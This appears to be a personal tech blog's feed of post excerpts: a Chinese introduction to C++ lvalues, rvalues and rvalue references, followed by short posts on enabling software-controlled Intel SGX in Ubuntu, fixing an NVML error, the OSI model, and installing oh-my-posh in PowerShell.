任何一个C++表达式（操作符和操作数，字面值，变量名等）都有两个不同的特征：数据类型以及它的值类别（请勿将二者混为一谈）。数据类型是我们非常熟悉的int、float、double或者其他诸如struct、class等的一些复合类型，这篇文章中，我们将会谈到一个已经是老生常谈但会被很多人忽视掉的内容，值类别。简单来说，值类别分为两种，左值（lvalue）与右值（rvalue）（其实还可进行细分，如prvalue，xvalue，glvalue等，但其内容较为深入且与本文并无太大关系，故不做赘述）。左值，顾名思义，为出现在等号左边的值（不是非常准确但有助于理解），因此它可以被赋值，这就代表着它有自己的名字对应的地址，可以出现在多条表达式中。而右值，姑且理解为出现在等号右边的值，也既临时变量（对象）。右值没有自己的名字，也无法在多个表达式中重复使用。因此，很多人可能会认为，右值无法被修改，它在整个生存周期内都会保持不变。实则不然，我们来看下面这个表达式：

T().set().get();

T为一个类，set为其中某个成员变量赋值，get则用来获取这个成员的值。我们可以发现，在构造函数T()返回了T的一个实例（此时为一个右值）之后，set函数对其进行了修改。因此，右值是可以被修改的。对于可以被修改却没有名字的值，很显然，我们应当对其引入引用的概念。

右值引用

C++11中引入了右值引用这一概念，为了和左值引用‘&’区分，C++11使用两个引号‘&&’来表示右值引用。定义方法如下

int &&x = 1;

Enable Software Controlled SGX in Ubuntu

Fri, 25 Sep 2020 13:45:12 +0000

Intel® Software Guard Extensions (SGX) is a hardware-based isolation and memory encryption mechanism provided by modern Intel® CPUs. Normally, it is disabled in the BIOS by the manufacture of your motherboard. In order to use it, the SGX option in the BIOS must be set to Enable or Software Controlled.

By setting the option to Enable, all of the SGX instructions and resources are available to applications, making it easy to deploy SGX related program on your machine. However, in some motherboards, the only available options in the BIOS are Software Controlled and Disable. According to the official document of Intel, Software Controlled indicates that Intel SGX can be enabled by software applications, but it is not available until this occurs (called the “software opt-in”).

How to Fix Failed to Initialize NVML Error in Ubuntu 20.04

Tue, 22 Sep 2020 14:03:06 +0800

Update the NVIDIA driver to 440.82 fixed this problem:)

OSI 7-Layer Model

Thu, 10 Sep 2020 10:29:19 +0000

The Open System Interconnection (OSI) model (defined in ISO 7498-1), which is a reference tool for understanding data communications between two networked systems, divides the communication processes into 7 layers:

Physical layer
Data link layer
Network layer
Transport layer
Session layer
Presentation layer
Application layer

Those layers break up the networks into manageable pioeces, which provides a common language to explain components and their functionalities. Here this article will give an overview of the 7 layers top-to-down.

Config oh-my-posh on Windows 10

Tue, 08 Sep 2020 07:05:30 +0000

oh-my-posh, as an alternative of oh-my-zsh in *nix-based system, is a beautiful theme engine for Powershell in Windows Terminal.

Prerequisites

Windows Terminal
Git
Powerline fonts (at least one font is needed to be installed)

Installation

Using the following commands to install the oh-my-posh in your Windows Terminal:

Install-Module posh-git -Scope CurrentUser  
Install-Module oh-my-posh -Scope CurrentUser

Now the oh-my-posh is successfully installed on your computer, the following commands are used to enable the prompt:

Mon, 01 Jan 0001 00:00:00 +0000